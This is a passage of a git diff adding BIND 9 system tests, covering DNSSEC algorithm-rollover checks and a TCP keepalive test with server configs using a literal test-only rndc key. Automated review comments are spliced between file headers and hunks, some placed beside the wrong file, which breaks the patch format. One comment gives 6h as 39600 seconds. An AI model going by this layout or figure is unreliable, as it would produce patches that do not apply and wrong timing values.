(32400 seconds). +rollover_predecessor_keytimes -32400 +# - And retired 6 hours ago (21600 seconds). +created=$(key_get KEY1 CREATED) +set_addkeytime "KEY1" "RETIRED" "${created}" -21600 +retired=$(key_get KEY1 RETIRED) +set_addkeytime "KEY1" "REMOVED" "${retired}" "${IretKSK}" + +created=$(key_get KEY2 CREATED) +set_addkeytime "KEY2" "RETIRED" "${created}" -21600 +retired=$(key_get KEY2 RETIRED) +set_addkeytime "KEY2" "REMOVED" "${retired}" "${IretZSK}" +# - The new keys are published 9 hours ago. 
+created=$(key_get KEY3 CREATED) +set_addkeytime "KEY3" "PUBLISHED" "${created}" -32400 +set_addkeytime "KEY3" "ACTIVE" "${created}" -32400 +published=$(key_get KEY3 PUBLISHED) +set_addkeytime "KEY3" "SYNCPUBLISH" "${published}" ${Ipub} + +created=$(key_get KEY4 CREATED) +set_addkeytime "KEY4" "PUBLISHED" "${created}" -32400 +set_addkeytime "KEY4" "ACTIVE" "${created}" -32400 + +# Continue signing policy checks. +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Tell named we "saw" the parent swap the DS and see if the next key event is +# scheduled at the correct time. +rndc_checkds "$SERVER" "$DIR" KEY1 "now" "withdrawn" "$ZONE" +rndc_checkds "$SERVER" "$DIR" KEY3 "now" "published" "$ZONE" +# Next key event is when the DS becomes OMNIPRESENT. This happens after the +# parent propagation delay, retire safety delay, and DS TTL: +# 1h + 2h + 2h = 5h = 18000 seconds. +check_next_key_event 18000 + +# +# Zone: step4.algorithm-roll.kasp +# +set_zone "step4.algorithm-roll.kasp" +set_policy "ecdsa256" "4" "3600" +set_server "ns6" "10.53.0.6" +# The old DS is HIDDEN, we can remove the old algorithm DNSKEY/RRSIG records. +set_keysigning "KEY1" "no" +set_keystate "KEY1" "STATE_DNSKEY" "unretentive" +set_keystate "KEY1" "STATE_KRRSIG" "unretentive" +set_keystate "KEY1" "STATE_DS" "hidden" + +set_zonesigning "KEY2" "no" +set_keystate "KEY2" "GOAL" "hidden" +set_keystate "KEY2" "STATE_DNSKEY" "unretentive" +set_keystate "KEY2" "STATE_ZRRSIG" "unretentive" +# The ECDSAP256SHA256 DS is now OMNIPRESENT. +set_keystate "KEY3" "STATE_DS" "omnipresent" + +# Various signing policy checks. +check_keys +wait_for_done_signing +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + +# Set expected key times: +# - The old keys were activated 38 hours ago (136800 seconds). +rollover_predecessor_keytimes -136800 +# - And retired 35 hours ago (126000 seconds). 
+created=$(key_get KEY1 CREATED) +set_addkeytime "KEY1" "RETIRED" "${created}" -126000 +retired=$(key_get KEY1 RETIRED) +set_addkeytime "KEY1" "REMOVED" "${retired}" "${IretKSK}" + +created=$(key_get KEY2 CREATED) +set_addkeytime "KEY2" "RETIRED" "${created}" -126000 +retired=$(key_get KEY2 RETIRED) +set_addkeytime "KEY2" "REMOVED" "${retired}" "${IretZSK}" + +# - The new keys are published 38 hours ago. +created=$(key_get KEY3 CREATED) +set_addkeytime "KEY3" "PUBLISHED" "${created}" -136800 +set_addkeytime "KEY3" "ACTIVE" "${created}" -136800 +published=$(key_get KEY3 PUBLISHED) +set_addkeytime "KEY3" "SYNCPUBLISH" "${published}" ${Ipub} + +created=$(key_get KEY4 CREATED) +set_addkeytime "KEY4" "PUBLISHED" "${created}" -136800 +set_addkeytime "KEY4" "ACTIVE" "${created}" -136800 + +# Continue signing policy checks. +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Next key event is when the old DNSKEY becomes HIDDEN. This happens after the +# DNSKEY TTL plus zone propagation delay (2h). +check_next_key_event 7200 + +# +# Zone: step5.algorithm-roll.kasp +# +set_zone "step5.algorithm-roll.kasp" +set_policy "ecdsa256" "4" "3600" +set_server "ns6" "10.53.0.6" +# The DNSKEY becomes HIDDEN. +set_keystate "KEY1" "STATE_DNSKEY" "hidden" +set_keystate "KEY1" "STATE_KRRSIG" "hidden" +set_keystate "KEY2" "STATE_DNSKEY" "hidden" + +# Various signing policy checks. +check_keys +wait_for_done_signing +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + +# Set expected key times: +# - The old keys were activated 40 hours ago (144000 seconds) +rollover_predecessor_keytimes -144000 +# - And retired 37 hours ago (133200 seconds). 
+created=$(key_get KEY1 CREATED) +set_addkeytime "KEY1" "RETIRED" "${created}" -133200 +retired=$(key_get KEY1 RETIRED) +set_addkeytime "KEY1" "REMOVED" "${retired}" "${IretKSK}" + +created=$(key_get KEY2 CREATED) +set_addkeytime "KEY2" "RETIRED" "${created}" -133200 +retired=$(key_get KEY2 RETIRED) +set_addkeytime "KEY2" "REMOVED" "${retired}" "${IretZSK}" + +# The new keys are published 40 hours ago. +created=$(key_get KEY3 CREATED) +set_addkeytime "KEY3" "PUBLISHED" "${created}" -144000 +set_addkeytime "KEY3" "ACTIVE" "${created}" -144000 +published=$(key_get KEY3 PUBLISHED) +set_addkeytime "KEY3" "SYNCPUBLISH" "${published}" ${Ipub} + +created=$(key_get KEY4 CREATED) +set_addkeytime "KEY4" "PUBLISHED" "${created}" -144000 +set_addkeytime "KEY4" "ACTIVE" "${created}" -144000 + +# Continue signing policy checks. +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Next key event is when the RSASHA1 signatures become HIDDEN. This happens +# after the max-zone-ttl plus zone propagation delay plus retire safety +# (6h + 1h + 2h) minus the time already passed since the UNRETENTIVE state has +# been reached (2h): 9h - 2h = 7h = 25200 seconds. Prevent intermittent +# false positives on slow platforms by subtracting the number of seconds +# which passed between key creation and invoking 'rndc reconfig'. +next_time=$((25200-time_passed)) +check_next_key_event $next_time + +# +# Zone: step6.algorithm-roll.kasp +# +set_zone "step6.algorithm-roll.kasp" +set_policy "ecdsa256" "4" "3600" +set_server "ns6" "10.53.0.6" +# The old zone signatures (KEY2) should now also be HIDDEN. +set_keystate "KEY2" "STATE_ZRRSIG" "hidden" + +# Various signing policy checks. +check_keys +wait_for_done_signing +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + +# Set expected key times: +# - The old keys were activated 47 hours ago (169200 seconds) +rollover_predecessor_keytimes -169200 +# - And retired 44 hours ago (158400 seconds). 
+created=$(key_get KEY1 CREATED) +set_addkeytime "KEY1" "RETIRED" "${created}" -158400 +retired=$(key_get KEY1 RETIRED) +set_addkeytime "KEY1" "REMOVED" "${retired}" "${IretKSK}" + +created=$(key_get KEY2 CREATED) +set_addkeytime "KEY2" "RETIRED" "${created}" -158400 +retired=$(key_get KEY2 RETIRED) +set_addkeytime "KEY2" "REMOVED" "${retired}" "${IretZSK}" + +# The new keys are published 47 hours ago. +created=$(key_get KEY3 CREATED) +set_addkeytime "KEY3" "PUBLISHED" "${created}" -169200 +set_addkeytime "KEY3" "ACTIVE" "${created}" -169200 +published=$(key_get KEY3 PUBLISHED) +set_addkeytime "KEY3" "SYNCPUBLISH" "${published}" ${Ipub} + +created=$(key_get KEY4 CREATED) +set_addkeytime "KEY4" "PUBLISHED" "${created}" -169200 +set_addkeytime "KEY4" "ACTIVE" "${created}" -169200 + +# Continue signing policy checks. +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Next key event is never since we established the policy and the keys have +# an unlimited lifetime. Fallback to the default loadkeys interval. +check_next_key_event 3600 + +# +# Testing CSK algorithm rollover. +# + +# Policy parameters. +# Lcsk: unlimited +Lcksk=0 + +# +# Zone: step1.csk-algorithm-roll.kasp +# +set_zone "step1.csk-algorithm-roll.kasp" +set_policy "csk-algoroll" "2" "3600" +set_server "ns6" "10.53.0.6" +# Old RSASHA1 key. +key_clear "KEY1" +set_keyrole "KEY1" "csk" +set_keylifetime "KEY1" "0" +set_keyalgorithm "KEY1" "8" "RSASHA256" "2048" +set_keysigning "KEY1" "yes" +set_zonesigning "KEY1" "yes" +# New ECDSAP256SHA256 key. +key_clear "KEY2" +set_keyrole "KEY2" "csk" +set_keylifetime "KEY2" "0" +set_keyalgorithm "KEY2" "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS" +set_keysigning "KEY2" "yes" +set_zonesigning "KEY2" "yes" +key_clear "KEY3" +key_clear "KEY4" +# The RSAHSHA1 key is outroducing. 
+set_keystate "KEY1" "GOAL" "hidden" +set_keystate "KEY1" "STATE_DNSKEY" "omnipresent" +set_keystate "KEY1" "STATE_KRRSIG" "omnipresent" +set_keystate "KEY1" "STATE_ZRRSIG" "omnipresent" +set_keystate "KEY1" "STATE_DS" "omnipresent" +# The ECDSAP256SHA256 key is introducing. +set_keystate "KEY2" "GOAL" "omnipresent" +set_keystate "KEY2" "STATE_DNSKEY" "rumoured" +set_keystate "KEY2" "STATE_KRRSIG" "rumoured" +set_keystate "KEY2" "STATE_ZRRSIG" "rumoured" +set_keystate "KEY2" "STATE_DS" "hidden" + +# Various signing policy checks. +check_keys +wait_for_done_signing +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + +# Set expected key times: +# - CSK must be retired since it no longer matches the policy. +csk_rollover_predecessor_keytimes 0 +keyfile=$(key_get KEY1 BASEFILE) +grep "; Inactive:" "${keyfile}.key" > retired.test${n}.ksk +retired=$(awk '{print $3}' < retired.test${n}.ksk) +set_keytime "KEY1" "RETIRED" "${retired}" +# - The key is removed after the retire interval: +# IretZSK = TTLsig + Dprp + Dsgn + retire-safety +# TTLsig: 6h (21600 seconds) +# Dprp: 1h (3600 seconds) +# Dsgn: 25d (2160000 seconds) +# retire-safety: 2h (7200 seconds) +# IretZSK: 25d9h (2192400 seconds) +IretCSK=2192400 +set_addkeytime "KEY1" "REMOVED" "${retired}" "${IretCSK}" +# - The new CSK is published and activated. +created=$(key_get KEY2 CREATED) +set_keytime "KEY2" "PUBLISHED" "${created}" +set_keytime "KEY2" "ACTIVE" "${created}" +# - It takes TTLsig + Dprp + publish-safety hours to propagate the zone. +# TTLsig: 6h (39600 seconds) +# Dprp: 1h (3600 seconds) +# publish-safety: 1h (3600 seconds) +# Ipub: 8h (28800 seconds) +Ipub=28800 +set_addkeytime "KEY2" "SYNCPUBLISH" "${created}" "${Ipub}" + +# Continue signing policy checks. +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Next key event is when the new key has been propagated. +# This is the DNSKEY TTL plus publish safety plus zone propagation delay: +# 3 times an hour: 10800 seconds. 
+check_next_key_event 10800 + +# +# Zone: step2.csk-algorithm-roll.kasp +# +set_zone "step2.csk-algorithm-roll.kasp" +set_policy "csk-algoroll" "2" "3600" +set_server "ns6" "10.53.0.6" +# The RSAHSHA1 key is outroducing, but need to stay present until the new +# algorithm chain of trust has been established. Thus the properties, timings +# and states of KEY1 is the same as above. +# +# The ECDSAP256SHA256 keys are introducing. The DNSKEY RRset is omnipresent, +# but the zone signatures are not. +set_keystate "KEY2" "STATE_DNSKEY" "omnipresent" +set_keystate "KEY2" "STATE_KRRSIG" "omnipresent" + +# Various signing policy checks. +check_keys +wait_for_done_signing +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + +# Set expected key times: +# - The old key was activated three hours ago (10800 seconds). +csk_rollover_predecessor_keytimes -10800 +# - CSK must be retired since it no longer matches the policy. +created=$(key_get KEY1 CREATED) +set_keytime "KEY1" "RETIRED" "${created}" +set_addkeytime "KEY1" "REMOVED" "${created}" "${IretCSK}" +# - The new key was published 3 hours ago. +created=$(key_get KEY2 CREATED) +set_addkeytime "KEY2" "PUBLISHED" "${created}" -10800 +set_addkeytime "KEY2" "ACTIVE" "${created}" -10800 +published=$(key_get KEY2 PUBLISHED) +set_addkeytime "KEY2" "SYNCPUBLISH" "${published}" "${Ipub}" + +# Continue signing policy checks. +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Next key event is when all zone signatures are signed with the new +# algorithm. This is the max-zone-ttl plus zone propagation delay +# plus retire safety: 6h + 1h + 2h. But three hours have already passed +# (the time it took to make the DNSKEY omnipresent), so the next event +# should be scheduled in 6 hour: 21600 seconds. Prevent intermittent +# false positives on slow platforms by subtracting the number of seconds +# which passed between key creation and invoking 'rndc reconfig'. 
+next_time=$((21600-time_passed)) +check_next_key_event $next_time + +# +# Zone: step3.csk-algorithm-roll.kasp +# +set_zone "step3.csk-algorithm-roll.kasp" +set_policy "csk-algoroll" "2" "3600" +set_server "ns6" "10.53.0.6" +# The RSAHSHA1 key is outroducing, and it is time to swap the DS. +# The ECDSAP256SHA256 key is introducing. The DNSKEY RRset and all signatures +# are now omnipresent, so the DS can be introduced. +set_keystate "KEY2" "STATE_ZRRSIG" "omnipresent" +# The old DS (KEY1) can be withdrawn and the new DS (KEY2) can be introduced. +set_keystate "KEY1" "STATE_DS" "unretentive" +set_keystate "KEY2" "STATE_DS" "rumoured" + +# Various signing policy checks. +check_keys +wait_for_done_signing +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +# Check that CDS publication is logged. +check_cdslog "$DIR" "$ZONE" KEY2 + +# Set expected key times: +# - The old key was activated 9 hours ago (32400 seconds). +csk_rollover_predecessor_keytimes -32400 +# - And was retired 6 hours ago (21600 seconds). +created=$(key_get KEY1 CREATED) +set_addkeytime "KEY1" "RETIRED" "${created}" -21600 +retired=$(key_get KEY1 RETIRED) +set_addkeytime "KEY1" "REMOVED" "${retired}" "${IretCSK}" +# - The new key was published 9 hours ago. +created=$(key_get KEY2 CREATED) +set_addkeytime "KEY2" "PUBLISHED" "${created}" -32400 +set_addkeytime "KEY2" "ACTIVE" "${created}" -32400 +published=$(key_get KEY2 PUBLISHED) +set_addkeytime "KEY2" "SYNCPUBLISH" "${published}" "${Ipub}" + +# Continue signing policy checks. +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# We ignore any parent registration delay, so set the DS publish time to now. +rndc_checkds "$SERVER" "$DIR" KEY1 "now" "withdrawn" "$ZONE" +rndc_checkds "$SERVER" "$DIR" KEY2 "now" "published" "$ZONE" +# Next key event is when the DS becomes OMNIPRESENT. This happens after the +# parent propagation delay, retire safety delay, and DS TTL: +# 1h + 2h + 2h = 5h = 18000 seconds. 
+check_next_key_event 18000 + +# +# Zone: step4.csk-algorithm-roll.kasp +# +set_zone "step4.csk-algorithm-roll.kasp" +set_policy "csk-algoroll" "2" "3600" +set_server "ns6" "10.53.0.6" +# The old DS is HIDDEN, we can remove the old algorithm DNSKEY/RRSIG records. +set_keysigning "KEY1" "no" +set_zonesigning "KEY1" "no" +set_keystate "KEY1" "STATE_DNSKEY" "unretentive" +set_keystate "KEY1" "STATE_KRRSIG" "unretentive" +set_keystate "KEY1" "STATE_ZRRSIG" "unretentive" +set_keystate "KEY1" "STATE_DS" "hidden" +# The ECDSAP256SHA256 DS is now OMNIPRESENT. +set_keystate "KEY2" "STATE_DS" "omnipresent" + +# Various signing policy checks. +check_keys +wait_for_done_signing +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + +# Set expected key times: +# - The old key was activated 38 hours ago (136800 seconds) +csk_rollover_predecessor_keytimes -136800 +# - And retired 35 hours ago (126000 seconds). +created=$(key_get KEY1 CREATED) +set_addkeytime "KEY1" "RETIRED" "${created}" -126000 +retired=$(key_get KEY1 RETIRED) +set_addkeytime "KEY1" "REMOVED" "${retired}" "${IretCSK}" +# - The new key was published 38 hours ago. +created=$(key_get KEY2 CREATED) +set_addkeytime "KEY2" "PUBLISHED" "${created}" -136800 +set_addkeytime "KEY2" "ACTIVE" "${created}" -136800 +published=$(key_get KEY2 PUBLISHED) +set_addkeytime "KEY2" "SYNCPUBLISH" "${published}" ${Ipub} + +# Continue signing policy checks. +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Next key event is when the old DNSKEY becomes HIDDEN. This happens after the +# DNSKEY TTL plus zone propagation delay (2h). +check_next_key_event 7200 + +# +# Zone: step5.csk-algorithm-roll.kasp +# +set_zone "step5.csk-algorithm-roll.kasp" +set_policy "csk-algoroll" "2" "3600" +set_server "ns6" "10.53.0.6" +# The DNSKEY becomes HIDDEN. +set_keystate "KEY1" "STATE_DNSKEY" "hidden" +set_keystate "KEY1" "STATE_KRRSIG" "hidden" + +# Various signing policy checks. 
+check_keys +wait_for_done_signing +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + +# Set expected key times: +# - The old key was activated 40 hours ago (144000 seconds) +csk_rollover_predecessor_keytimes -144000 +# - And retired 37 hours ago (133200 seconds). +created=$(key_get KEY1 CREATED) +set_addkeytime "KEY1" "RETIRED" "${created}" -133200 +retired=$(key_get KEY1 RETIRED) +set_addkeytime "KEY1" "REMOVED" "${retired}" "${IretCSK}" +# - The new key was published 40 hours ago. +created=$(key_get KEY2 CREATED) +set_addkeytime "KEY2" "PUBLISHED" "${created}" -144000 +set_addkeytime "KEY2" "ACTIVE" "${created}" -144000 +published=$(key_get KEY2 PUBLISHED) +set_addkeytime "KEY2" "SYNCPUBLISH" "${published}" ${Ipub} + +# Continue signing policy checks. +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Next key event is when the RSASHA1 signatures become HIDDEN. This happens +# after the max-zone-ttl plus zone propagation delay plus retire safety +# (6h + 1h + 2h) minus the time already passed since the UNRETENTIVE state has +# been reached (2h): 9h - 2h = 7h = 25200 seconds. Prevent intermittent +# false positives on slow platforms by subtracting the number of seconds +# which passed between key creation and invoking 'rndc reconfig'. +next_time=$((25200-time_passed)) +check_next_key_event $next_time + +# +# Zone: step6.csk-algorithm-roll.kasp +# +set_zone "step6.csk-algorithm-roll.kasp" +set_policy "csk-algoroll" "2" "3600" +set_server "ns6" "10.53.0.6" +# The zone signatures should now also be HIDDEN. +set_keystate "KEY1" "STATE_ZRRSIG" "hidden" + +# Various signing policy checks. +check_keys +wait_for_done_signing +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + +# Set expected key times: +# - The old keys were activated 47 hours ago (169200 seconds) +csk_rollover_predecessor_keytimes -169200 +# - And retired 44 hours ago (158400 seconds). 
+created=$(key_get KEY1 CREATED) +set_addkeytime "KEY1" "RETIRED" "${created}" -158400 +retired=$(key_get KEY1 RETIRED) +set_addkeytime "KEY1" "REMOVED" "${retired}" "${IretCSK}" +# - The new key was published 47 hours ago. +created=$(key_get KEY2 CREATED) +set_addkeytime "KEY2" "PUBLISHED" "${created}" -169200 +set_addkeytime "KEY2" "ACTIVE" "${created}" -169200 +published=$(key_get KEY2 PUBLISHED) +set_addkeytime "KEY2" "SYNCPUBLISH" "${published}" ${Ipub} + +# Continue signing policy checks. +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Next key event is never since we established the policy and the keys have +# an unlimited lifetime. Fallback to the default loadkeys interval. +check_next_key_event 3600 + +_check_soa_ttl() { + dig_with_opts @10.53.0.6 example SOA > dig.out.ns6.test$n.soa2 || return 1 + soa1=$(awk '$4 == "SOA" { print $7 }' dig.out.ns6.test$n.soa1) + soa2=$(awk '$4 == "SOA" { print $7 }' dig.out.ns6.test$n.soa2) + ttl1=$(awk '$4 == "SOA" { print $2 }' dig.out.ns6.test$n.soa1) + ttl2=$(awk '$4 == "SOA" { print $2 }' dig.out.ns6.test$n.soa2) + test ${soa1:-1000} -lt ${soa2:-0} || return 1 + test ${ttl1:-0} -eq $1 || return 1 + test ${ttl2:-0} -eq $2 || return 1 +} + +n=$((n+1)) +echo_i "Check that 'rndc reload' of just the serial updates the signed instance ($n)" +TSIG= +ret=0 +dig_with_opts @10.53.0.6 example SOA > dig.out.ns6.test$n.soa1 || ret=1 +cp ns6/example2.db.in ns6/example.db || ret=1 +nextpart ns6/named.run > /dev/null +rndccmd 10.53.0.6 reload || ret=1 +wait_for_log 3 "all zones loaded" ns6/named.run +# Check that the SOA SERIAL increases and check the TTLs (should be 300 as +# defined in ns6/example2.db.in). 
+retry_quiet 10 _check_soa_ttl 300 300 || ret=1
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "Check that restart with zone changes and deleted journal works ($n)"
+TSIG=
+ret=0
+dig_with_opts @10.53.0.6 example SOA > dig.out.ns6.test$n.soa1 || ret=1
+stop_server --use-rndc --port ${CONTROLPORT} ns6
+# TTL of all records change from 300 to 400
+cp ns6/example3.db.in ns6/example.db || ret=1
+rm ns6/example.db.jnl
+nextpart ns6/named.run > /dev/null
+start_server --noclean --restart --port ${PORT} ns6
+wait_for_log 3 "all zones loaded" ns6/named.run
+# Check that the SOA SERIAL increases and check the TTLs (should be changed
+# from 300 to 400 as defined in ns6/example3.db.in).
+retry_quiet 10 _check_soa_ttl 300 400 || ret=1
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "exit status: $status"
+[ $status -eq 0 ] || exit 1
diff --git a/bin/tests/system/keepalive/clean.sh b/bin/tests/system/keepalive/clean.sh
new file mode 100644
index 0000000..9ccbd12
--- /dev/null
+++ b/bin/tests/system/keepalive/clean.sh
@@ -0,0 +1,21 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+rm -f dig.out.*
+rm -f output
+rm -f ns*/named.memstats
+rm -f ns*/named.run
+rm -f ns*/named.conf
+rm -f ns*/named.stats
+rm -f ns*/named.lock
+rm -f ns*/managed-keys.bind*
diff --git a/bin/tests/system/keepalive/expected b/bin/tests/system/keepalive/expected
new file mode 100644
index 0000000..e498db7
--- /dev/null
+++ b/bin/tests/system/keepalive/expected
@@ -0,0 +1,4 @@
+tcp-initial-timeout=300
+tcp-idle-timeout=300
+tcp-keepalive-timeout=300
+tcp-advertised-timeout=200
diff --git a/bin/tests/system/keepalive/ns1/named.conf.in b/bin/tests/system/keepalive/ns1/named.conf.in
new file mode 100644
index 0000000..26cf4b3
--- /dev/null
+++ b/bin/tests/system/keepalive/ns1/named.conf.in
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.1;
+ notify-source 10.53.0.1;
+ transfer-source 10.53.0.1;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ recursion no;
+ notify yes;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." {
+ type primary;
+ file "root.db";
+};
diff --git a/bin/tests/system/keepalive/ns1/root.db b/bin/tests/system/keepalive/ns1/root.db
new file mode 100644
index 0000000..17780d1
--- /dev/null
+++ b/bin/tests/system/keepalive/ns1/root.db
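Review bot: The `key rndc_key` block in ns1/named.conf.in commits a literal secret (`secret "1234abcd8765";`) and the `controls` statement pairs it with `allow { any; }`, with nothing in the file saying that this is a throwaway test credential on a test-only address. The same key and control-channel ACL are repeated in ns2/named.conf.in and ns3/named.conf.in. keepalive/tests.sh drives rndc through `../common/rndc.conf`, so the value presumably has to match that file; I would add a comment above the key block such as `/* Test-only rndc key; must match ../common/rndc.conf. Not for use outside the system tests. */`. That gives secret scanners and later readers a stated reason for the literal and for the open ACL.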
@@ -0,0 +1,24 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300
+. IN SOA gson.nominum.com. a.root.servers.nil. (
+ 2000042100 ; serial
+ 600 ; refresh
+ 600 ; retry
+ 1200 ; expire
+ 600 ; minimum
+ )
+. NS a.root-servers.nil.
+a.root-servers.nil. A 10.53.0.1
+
+example. NS ns2.example.
+ns2.example. A 10.53.0.2
diff --git a/bin/tests/system/keepalive/ns2/example.db b/bin/tests/system/keepalive/ns2/example.db
new file mode 100644
index 0000000..ccc6ef9
--- /dev/null
+++ b/bin/tests/system/keepalive/ns2/example.db
@@ -0,0 +1,16 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+@ SOA ns2 hostmaster.isc.org. 1 600 600 1200 600
+@ NS ns2
+ns2 A 10.53.0.2
+foo A 10.53.1.1
+bar A 10.53.2.2
diff --git a/bin/tests/system/keepalive/ns2/named.conf.in b/bin/tests/system/keepalive/ns2/named.conf.in
new file mode 100644
index 0000000..6e308f4
--- /dev/null
+++ b/bin/tests/system/keepalive/ns2/named.conf.in
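Review bot: ns2/example.db has no `$TTL` directive and its SOA record carries no explicit TTL, so the TTL of every record in the zone depends on the server's fallback rule. As far as I know named then falls back to the SOA minimum (600 here) and logs a warning when the zone loads. The sibling ns1/root.db in this commit starts its records with `$TTL 300`; adding the same line before the SOA in example.db makes the TTLs explicit and keeps the load quiet.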
@@ -0,0 +1,45 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+options {
+ query-source address 10.53.0.2;
+ notify-source 10.53.0.2;
+ transfer-source 10.53.0.2;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion yes;
+ acache-enable yes;
+ send-cookie yes;
+ tcp-advertised-timeout 150;
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
+
+zone "example" {
+ type primary;
+ file "example.db";
+};
diff --git a/bin/tests/system/keepalive/ns3/named.conf.in b/bin/tests/system/keepalive/ns3/named.conf.in
new file mode 100644
index 0000000..b6b8073
--- /dev/null
+++ b/bin/tests/system/keepalive/ns3/named.conf.in
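Review bot: `acache-enable yes;` in the ns2 options block looks like a leftover. The additional-section cache it controlled was removed from named some releases ago, and as far as I know the option is now either accepted only as obsolete (with a warning) or rejected, depending on the release. Nothing in keepalive/tests.sh depends on it, so I would drop the line. It would also help to note beside `tcp-advertised-timeout 150;` that the value is in units of 100 ms, which is why tests.sh expects `TCP KEEPALIVE: 15.0 secs`, for example `/* units of 100 ms: advertised as 15.0 secs */`.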
@@ -0,0 +1,44 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.3;
+ notify-source 10.53.0.3;
+ transfer-source 10.53.0.3;
+ port @PORT@;
+ directory ".";
+ pid-file "named.pid";
+ listen-on { 10.53.0.3; };
+ listen-on-v6 { none; };
+ recursion yes;
+ notify yes;
+};
+
+server 10.53.0.2 {
+ tcp-only yes;
+ tcp-keepalive yes;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
diff --git a/bin/tests/system/keepalive/setup.sh b/bin/tests/system/keepalive/setup.sh
new file mode 100644
index 0000000..57e0575
--- /dev/null
+++ b/bin/tests/system/keepalive/setup.sh
@@ -0,0 +1,19 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+copy_setports ns1/named.conf.in ns1/named.conf
+copy_setports ns2/named.conf.in ns2/named.conf
+copy_setports ns3/named.conf.in ns3/named.conf
diff --git a/bin/tests/system/keepalive/tests.sh b/bin/tests/system/keepalive/tests.sh
new file mode 100644
index 0000000..7aea925
--- /dev/null
+++ b/bin/tests/system/keepalive/tests.sh 
